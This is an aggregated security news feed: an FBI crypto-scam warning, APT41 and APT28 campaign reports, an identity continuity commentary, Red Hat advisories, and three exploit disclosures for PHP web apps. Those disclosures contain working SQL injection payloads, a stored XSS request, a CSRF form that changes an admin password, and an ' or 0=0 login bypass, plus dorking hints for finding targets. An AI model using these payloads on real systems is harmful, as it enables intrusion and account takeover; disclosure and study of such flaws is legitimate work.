The FBI warns about scammers that impersonate employees of cryptocurrrency exchanges as a means to defraud victims

The Federal Bureau of Investigation (FBI) issued a public service announcement warning the public about scammers impersonating cryptocurrency exchange employees to steal funds.

There are many types of crypto related scams, but in this case, the FBI provided an advisory about scammers that contact the target and pretend to be employees of a cryptocurrency exchange.

As scammers almost always do, they try to impose a feeling of urgency on the target, making potential victims feel as though they must act quickly because of, say, an acute problem with their account. Such an account may be allegedly compromised, or scammers could trick a victim into thinking that a third party is trying to gain access and withdraw funds from the account.

The scammer then offers to help the target to secure their funds, but to do so, the scammer—posing as a legitimate employee of the cryptocurrency exchange—first needs the victim’s log in credentials. Sometimes, scammers also send a malicious link to the victim which takes the victim to a illegitimate site that can collect identification information.

Armed with the information the target provided, the scammer drains the account. In a sense, the false warning that first came from the scammer was true—someone was after their account, it’s just that this specific someone was the person talking to the victim themselves.

Very similar scams exist that involve bank accounts, but most people are aware of how they can check and verify that the person they are in contact with actually works for their bank. With cryptocurrency exchanges, this is often not true.

Also, we see a lot of scary stories in the news about exchanges getting robbed or even disappearing with their customer’s money. Some crypto-related scams often deploy imposter websites which are hard to discern from the real ones.

Recovery services are another successful avenue for scammers. In June, the FBI warned of fraudsters posing as lawyers representing fictitious law firms that contact scam victims and offer their services, claiming to have the authorization to investigate fund recovery cases.

These scammers are usually after more money or personal information that could lead to identity theft.

The California Department of Financial Protection & Innovation (DFPI) has a very useful crypto scam tracker that allows visitors to read and search through hundreds of different real-life scenarios of crypto-related scams.

The most important ground rule when it comes to cryptocurrency or financial scams of any kind is: if it sounds too good to be true, it likely is.

Besides that, there are a few other guidelines that can keep you out of trouble.

*   Don’t respond to messages, emails or other communications that arrive unexpectedly or from strange senders/phone numbers.
*   First verify that the person you are communicating with represents the company they claim to work for. Do this using another channel. A call to a number you know to be legitimate, for example.
*   Don’t let scammers rush you into decisions or actions. They try to make you feel a sense of urgency, so you don’t take the necessary time to think things through.
*   Always research whether the cryptowallet, cryptoexchange, or app they are sending you to is trustworthy before signing up for it or installing something.
*   Use multi-factor authentication (MFA) for existing accounts which makes it harder for anyone to take over your account.
*   Never give out more information than absolutely necessary. A legitimate company will not ask for more information.

The FBI requests victims report activity associated with this scam to the FBI IC3 at www.ic3.gov.

The FBI also requests victims provide any transaction information associated with the scam. For more information on what to provide the FBI, see prior IC3 PSA Alert Number I-082423-PSA.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

 Scammers are impersonating cryptocurrency exchanges, FBI warns 

A Taiwanese government-affiliated research institute that specializes in computing and associated technologies was breached by nation-state threat actors with ties to China, according to new findings from Cisco Talos.
The unnamed organization was targeted as early as mid-July 2023 to deliver a variety of backdoors and post-compromise tools like ShadowPad and Cobalt Strike. It has been attributed

Cyber Espionage / Malware

A Taiwanese government-affiliated research institute that specializes in computing and associated technologies was breached by nation-state threat actors with ties to China, according to new findings from Cisco Talos.

The unnamed organization was targeted as early as mid-July 2023 to deliver a variety of backdoors and post-compromise tools like ShadowPad and Cobalt Strike. It has been attributed with medium confidence to a prolific hacking group tracked as APT41.

"The ShadowPad malware used in the current campaign exploited an outdated vulnerable version of Microsoft Office IME binary as a loader to load the customized second-stage loader for launching the payload," security researchers Joey Chen, Ashley Shen, and Vitor Ventura said.

"The threat actor compromised three hosts in the targeted environment and was able to exfiltrate some documents from the network."

Cisco Talos said it discovered the activity in August 2023 after detecting what it described were "abnormal PowerShell commands" that connected to an IP address to download and execute PowerShell scripts within the compromised environment.

The exact initial access vector used in the attack is not known, although it involved the use of a web shell to maintain persistent access and drop additional payloads like ShadowPad and Cobalt Strike, with the latter delivered by means a Go-based Cobalt Strike loader named CS-Avoid-Killing.

"The Cobalt Strike malware had been developed using an anti-AV loader to bypass AV detection and avoid the security product quarantine," the researchers said.

Alternately, the threat actor was observed running PowerShell commands to launch scripts responsible for running ShadowPad in memory and fetch Cobalt Strike malware from a compromised command-and-control (C2) server. The DLL-based ShadowPad loader, also called ScatterBee, is executed via DLL side-loading.

Some of the other steps carried out as part of the intrusion comprised the use of Mimikatz to extract passwords and the execution of several commands to gather information on user accounts, directory structure, and network configurations.

"APT41 created a tailored loader to inject a proof-of-concept for CVE-2018-0824 directly into memory, utilizing a remote code execution vulnerability to achieve local privilege escalation," Talos said, noting the final payload, UnmarshalPwn, is unleashed after passing through three different stages.

The cybersecurity outfit also pointed out the adversary's attempts to avoid detection by halting its own activity upon detecting other users on the system. "Once the backdoors are deployed the malicious actor will delete the web shell and guest account that allowed the initial access," the researchers said.

The disclosure comes as Germany revealed earlier this week that Chinese state actors were behind a 2021 cyber attack on the country's national mapping agency, the Federal Office of Cartography and Geodesy (BKG), for espionage purposes.

Responding to the allegations, China's embassy in Berlin said the accusation is unfounded and called on Germany "to stop the practice of using cybersecurity issues to smear China politically and in the media."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

APT41 Hackers Use ShadowPad, Cobalt Strike in Taiwanese Institute Cyber Attack

A Russia-linked threat actor has been linked to a new campaign that employed a car for sale as a phishing lure to deliver a modular Windows backdoor called HeadLace.

"The campaign likely targeted diplomats and began as early as March 2024," Palo Alto Networks Unit 42 said in a report published today, attributing it with medium to high level of confidence to APT28, which is also referred to as

Cyber Espionage / Malware

A Russia-linked threat actor has been linked to a new campaign that employed a car for sale as a phishing lure to deliver a modular Windows backdoor called HeadLace.

"The campaign likely targeted diplomats and began as early as March 2024," Palo Alto Networks Unit 42 said in a report published today, attributing it with medium to high level of confidence to APT28, which is also referred to as BlueDelta, Fancy Bear, Fighting Ursa, Forest Blizzard, FROZENLAKE, Iron Twilight, ITG05, Pawn Storm, Sednit, Sofacy, and TA422.

It's worth noting that car-for-sale phishing lure themes have been previously put to use by a different Russian nation-state group called APT29 since July 2023, indicating that APT28 is repurposing successful tactics for its own campaigns.

Earlier this May, the threat actor was implicated in a series of campaigns targeting networks across Europe with the HeadLace malware and credential-harvesting web pages.

The attacks are characterized by the use of a legitimate service known as webhook\[.\]site – a hallmark of APT28's cyber operations along with Mocky – to host a malicious HTML page, which first checks whether the target machine is running on Windows and if so, offers a ZIP archive for download ("IMG-387470302099.zip").

If the system is not Windows-based, it redirects to a decoy image hosted on ImgBB, specifically an Audi Q7 Quattro SUV.

Present within the archive are three files: The legitimate Windows calculator executable that masquerades as an image file ("IMG-387470302099.jpg.exe"), a DLL ("WindowsCodecs.dll"), and a batch script ("zqtxmo.bat").

The calculator binary is used to sideload the malicious DLL, a component of the HeadLace backdoor that's designed to run the batch script, which, in turn, executes a Base64-encoded command to retrieve a file from another webhook\[.\]site URL.

This file is then saved as "IMG387470302099.jpg" in the users' downloads folder and renamed to "IMG387470302099.cmd" prior to execution, after which it's deleted to erase traces of any malicious activity.

"While the infrastructure used by Fighting Ursa varies for different attack campaigns, the group frequently relies on these freely available services," Unit 42 said. "Furthermore, the tactics from this campaign fit with previously documented Fighting Ursa campaigns, and the HeadLace backdoor is exclusive to this threat actor."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

APT28 Targets Diplomats with HeadLace Malware via Car Sale Phishing Lure

Leads Manager Tool suffers from remote SQL injection and cross site scripting vulnerabilities.

    [x]========================================================================================================================================[x] | Title        : Leads Manager Tool SQL & XSS[stored)] Vulnerabilities | Software     : Leads Manager Tool Using PHP and MySQL with Source Code | Create By  : https://www.sourcecodester.com/users/remyandrade | First Release: 25/01/22 | Download     : https://www.sourcecodester.com/php/17510/leads-manager-tool-using-php-and-mysql-source-code.html | Date         : 30 Agustus 2024 | Author       : OoN_Boy[x]========================================================================================================================================[x] | Technology       : PHP | Database         : MySQL | Price            : FREE | Description      : Leads Manager Tool, a comprehensive web application designed to streamline the process of managing business leads. Built with the power of PHP and MySQL, this tool offers a seamless and user-friendly experience for storing, updating, and organizing lead information[x]========================================================================================================================================[x][O] Exploit    http://localhost/leads-manager-tool/endpoint/delete-leads.php?leads=[SQL]  http://localhost/leads-manager-tool/endpoint/add-leads.php    [O] Proof of concept  [SQL]  Parameter: leads (GET)    Type: boolean-based blind  Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause  Payload: leads= --emurate' RLIKE (SELECT (CASE WHEN (8305=8305) THEN 0x202d2d656d7572617465 ELSE 0x28 END))-- rUwl  Type: error-based  Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  Payload: leads= --emurate' OR (SELECT 1382 FROM(SELECT COUNT(*),CONCAT(0x7162787171,(SELECT (ELT(1382=1382,1))),0x7176706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- vKls  Type: stacked queries  Title: MySQL >= 5.0.12 stacked queries (comment)  Payload: leads= --emurate';SELECT SLEEP(5)#  Type: time-based blind  Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  Payload: leads= --emurate' AND (SELECT 1244 FROM (SELECT(SLEEP(5)))fAev)-- ZNBt    [XSS]    POST /leads-manager-tool/endpoint/add-leads.php HTTP/1.1  Host: 127.0.0.1  Accept-Encoding: gzip, deflate, br  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  Accept-Language: en-US;q=0.9,en;q=0.8  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36  Connection: close  Cache-Control: max-age=0  Origin: http://127.0.0.1  Upgrade-Insecure-Requests: 1  Referer: http://127.0.0.1/leads-manager-tool/  Content-Type: application/x-www-form-urlencoded  Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="126", "Chromium";v="126"  Sec-CH-UA-Platform: Windows  Sec-CH-UA-Mobile: ?0  Content-Length: 85  leads_name=Vrs<script>alert(1)</script>Hck&email_add=vrs-hck@maho.id&phone_number=911-911-9111    [x]========================================================================================================================================[x][O] GreetzBatamHacker, Vrs-hCk, c0li, h4ntu, Opay, Ndet, Ipay, Paman, NoGe, H312Y, dono, pizzyroot, zxvf, Joe Chawanua, k0rea [Ntc],xx_user, s3t4n, Angela Chang, IrcMafia, str0ke, em|nem, Pandoe, Ronny ^s0n g0ku^[x]========================================================================================================================================[x]

Leads Manager Tool SQL Injection / Cross Site Scripting

Having a robust identity continuity plan is not just beneficial but essential for avoiding financially costly and potentially brand-damaging outages.

Source: Borka Kiss via Alamy Stock Photo

COMMENTARY  
In the modern enterprise, where IT infrastructure, applications, and data are spread across multiple clouds, hybrid clouds, and on-premises data centers, identity ensures that the right individuals have access to the right resources at the right times. In many ways, identity is now on par with electricity when it comes to business continuity. Without it, business operations grind to a standstill. 

Just as most businesses have backup power sources so they can continue to operate when their electric utility goes down, organizations should implement an identity continuity plan to maintain the availability of critical IT systems if their primary identity provider (IDP) is offline. Having a failover plan is more critical than ever, since many organizations now rely on cloud-based IDPs that are vulnerable to outages for a host of reasons, including provider outages, natural disasters, loss of Internet connectivity, and more. 

When developing an identity continuity strategy, the NIST Cybersecurity Framework can serve as a valuable model to follow. Designed to help organizations manage and mitigate cybersecurity risks, it consists of five core functions: Identify, Protect, Detect, Respond, and Recover. Each function plays a pivotal role in forming a robust identity continuity plan. Here’s how to map an identity continuity plan to the NIST Cybersecurity Framework. 

**Identify****Inventory Applications, Policies, and Identities**

The initial step in creating an identity continuity plan involves cataloging all applications, policies, and identities within the organization. This inventory should distinguish between different user groups, such as customers and employees, to address their specific access requirements effectively.

This process should include detailing interdependencies and criticalities to ensure comprehensive coverage. Classifying these resources based on their criticality and the potential impact of downtime helps prioritize efforts. For instance:

*   Critical applications: These are vital for immediate business operations, like primary revenue-generating platforms.
    
*   Important applications: These support daily operations but can endure short periods of downtime.
    
*   Supportive applications: These are necessary but not critical on an hour-to-hour basis.
    
*   Non-essential applications: These can tolerate extended downtimes without significant impact.
    

**Routine Continuity Tests**

Regularly testing the continuity plan is crucial for identifying gaps and ensuring its effectiveness. Routine tests help keep the plan up to date and ready for real-world disruptions.

**Protect****Ensure Continuous Identity Operations**

Protecting identity operations requires ensuring continuous access to identity services. This includes establishing robust mechanisms for cloud-to-cloud and cloud-to-premises failovers. With many organizations adopting zero-trust architectures, where each access request requires continuous authentication and authorization checks, identity continuity is even more critical to ensure end-to-end security.

**Develop Disaster Recovery Plans**

While preventing outages is always best, in addition to continuity planning it's critical to also have a disaster recovery plan. Regular backups of policies and resources from cloud and on-premises identity infrastructures ensure quick restoration if a rebuild is necessary.

**Detect****Monitor Identity Infrastructure**

Implement centralized analytics and reporting to continuously monitor the availability of identity and access services. Early detection of outages or slowdowns allows for prompt intervention and proactive response.

**Conduct Regular Testing**

Regular continuity tests simulate real-world scenarios to detect potential weaknesses in the identity infrastructure. This proactive "test to verify" approach ensures that the continuity plan is robust and effective.

**Respond****Maintain Continuous Identity Operations**

Develop strategies for failover and fail-back to ensure continuous identity operations. Predefined custom actions, alerts, and automations should be in place to handle various scenarios.

**Establish Failover Mechanisms**

Multiple layers of failover mechanisms ensure redundancy and resilience. For example, assign:

*   Primary identity provider (IDP)
    

*   On-premises IDP (as a last-resort backup)
    

**Predefine Continuity Actions**

Having predefined continuity actions ensures a swift and organized response to identity service disruptions. Actions can include automatic service ticket opening, initiating an incident response workflow, or some other scriptable action. This minimizes downtime and mitigates its impact on operations.

**Recover****Manage Incidents and Resolve Outages**

An incident management plan should outline the steps for failover, failback, and incident resolution. The focus should be on quick recovery while documenting and analyzing any anomalies. Use data collected for availability and outages with your IDP vendor to negotiate expectations.

**Run Disaster Recovery Backups**

Ensure the disaster recovery plan includes procedures for running backup and restore operations. This enables swift recovery from identity service outages, minimizing downtime.

**Govern****Continuous Monitoring and Policy Management**

Implement continuous monitoring of identity systems to ensure adherence to established policies. Regularly update, document, and report policies to reflect changes in the IT environment and emerging threats.

**Monitor Access Requests and Activities**

Track access requests and activities to identify unusual patterns that may indicate security threats. Continuous monitoring helps maintain a proactive defense against potential disruptions.

By leveraging the NIST Cybersecurity Framework, organizations can develop a comprehensive identity continuity plan that ensures resilience against disruptions. Now that identity is interwoven into all business operations and predominantly relies on cloud-based IDPs, having a robust identity continuity plan is not just beneficial but essential for avoiding financially costly and potentially brand-damaging outages.

**About the Author**

CEO, Strata Identity

Eric has made a career out of simplifying and securing enterprise identity management. He founded, scaled, and successfully exited both Securant/ClearTrust (Web Access Management) and Symplified, (the first IDaaS company). Recently Eric served as SVP and GM at Oracle, where he ran the identity and security business worldwide and was responsible for product development, go to market, and partnerships. As a technologist, he was a co-author of the SAML standard, created the first pre-integrated SSO platform, and is the visionary behind the Identity Fabric™.

Implementing Identity Continuity With the NIST Cybersecurity Framework

AccPack Cop version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : AccPack Cop v1.0 CSRF Vulnerability                                                                                         |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            |  
| # Vendor    : http://webpay.com.np/#Product                                                                                               |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following HTML code modifies the admin information.

[+] Go to the line 5. Set the target site link Save changes and apply . 

[+] infected file : cms/user/modify.php.

[+] http://127.0.0.1/q7.3/cms/user/modify.php.

[+] save code as poc.html 

[+] payload : 

</head>  
<body>  
  <div class="container">  
    <div class="text-center" style="padding: 5px"><h3>User Edit</h3></div>  
    <form action="https://tssclahanorgnp/cms/user/modify.php" method="POST"  enctype="multipart/form-data">  
      <div hidden="true">  
        <input type="text" name="id" id="id" value="1">  
      </div>  
       <div>  
        <label for='email'>Email</label><input  type="text" class="form-control" name='email' id='email' value="indoushka@mail.dz">  
       </div>  
       <div>  
        <label for='password'>Password</label><input  type="text" class="form-control" name='password' id='password' type='password' value="123456">  
       </div>  
       <tr>  
       <div>  
        <label for='status'>Status</label>  
          <input type="radio" name="status" id="actiive" value="1" checked /> <label for="active">Active</label>  
          <input type="radio" name="status" id="passive" value="0" /><label for="passive">Passive</label>

               </div>     
       <div style='height:80'>  
        <input type='submit' value='Submit'><input type='reset' Value='Reset'>  
       </div>  
    </form>  
  </div>

</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

AccPack Cop 1.0 Cross Site Request Forgery

AccPack Buzz version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : AccPack Buzz v1.0 Auth By Pass Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/#Product                                                                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = ' or 0=0 ##[+] Panel : http://127.0.0.1/jamiatulamanepal.orgnp/cms/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

AccPack Buzz 1.0 SQL Injection

Red Hat Security Advisory 2024-4972-03 - An update is now available for Red Hat OpenShift GitOps v1.11.7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link in the References section. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4972.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Errata Advisory for Red Hat OpenShift GitOps v1.11.7 security updateAdvisory ID:        RHSA-2024:4972-03Product:            Red Hat OpenShift GitOpsAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4972Issue date:         2024-08-01Revision:           03CVE Names:          CVE-2023-40025====================================================================Summary: An update is now available for Red Hat OpenShift GitOps v1.11.7. Red HatProduct Security has rated this update as having a security impact of Important.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Errata Advisory for Red Hat OpenShift GitOps v1.11.7.Security Fix(es):* openshift-gitops-argocd-container: Unauthenticated Denial of Service (DoS) Vulnerability via /api/webhook Endpoint in Argo CD [gitops-1.11](CVE-2024-40634)* openshift-gitops-container: Argo CD web terminal session doesn't expire [gitops-1.11](CVE-2023-40025)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-40025References:https://access.redhat.com/security/updates/classification/#important

Red Hat Security Advisory 2024-4972-03

Red Hat Security Advisory 2024-4858-03 - Red Hat OpenShift Container Platform release 4.16.5 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include deserialization and memory exhaustion vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4858.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: OpenShift Container Platform 4.16.5 packages and security update  
Advisory ID:        RHSA-2024:4858-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:4858  
Issue date:         2024-07-31  
Revision:           03  
CVE Names:          CVE-2024-6104  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.16.5 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.16.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.16.5. See the following advisory for the container images for this release:

https://access.redhat.com/errata/RHBA-2024:4855

Security Fix(es):

* gorilla/schema: Potential memory exhaustion attack due to sparse slice  
deserialization (CVE-2024-37298)  
* go-retryablehttp: url might write sensitive information to log file  
(CVE-2024-6104)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

All OpenShift Container Platform 4.16 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.16/updating/updating_a_cluster/updating-cluster-cli.html

Solution:

https://docs.openshift.com/container-platform/4.16/release_notes/ocp-4-16-release-notes.html

CVEs:

CVE-2024-6104

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2294000  
https://bugzilla.redhat.com/show_bug.cgi?id=2295010

Red Hat Security Advisory 2024-4858-03

Red Hat Security Advisory 2024-4846-03 - Red Hat OpenShift Container Platform release 4.13.46 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4846.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: OpenShift Container Platform 4.13.46 security update  
Advisory ID:        RHSA-2024:4846-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:4846  
Issue date:         2024-07-31  
Revision:           03  
CVE Names:          CVE-2023-29483  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.13.46 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.13.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.13.46. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHSA-2024:4848

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-13-release-notes.html

Security Fix(es):

* dnspython: denial of service in stub resolver (CVE-2023-29483)  
* go-retryablehttp: url might write sensitive information to log file  
(CVE-2024-6104)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.  
All OpenShift Container Platform 4.13 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.13/updating/updating-cluster-cli.html

Solution:

CVEs:

CVE-2023-29483

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2274520  
https://bugzilla.redhat.com/show_bug.cgi?id=2294000  
https://issues.redhat.com/browse/OCPBUGS-11449  
https://issues.redhat.com/browse/OCPBUGS-35053  
https://issues.redhat.com/browse/OCPBUGS-36745  
https://issues.redhat.com/browse/OCPBUGS-36782  
https://issues.redhat.com/browse/OCPBUGS-36962  
https://issues.redhat.com/browse/OCPBUGS-37075  
https://issues.redhat.com/browse/OCPBUGS-37160

Tag

#web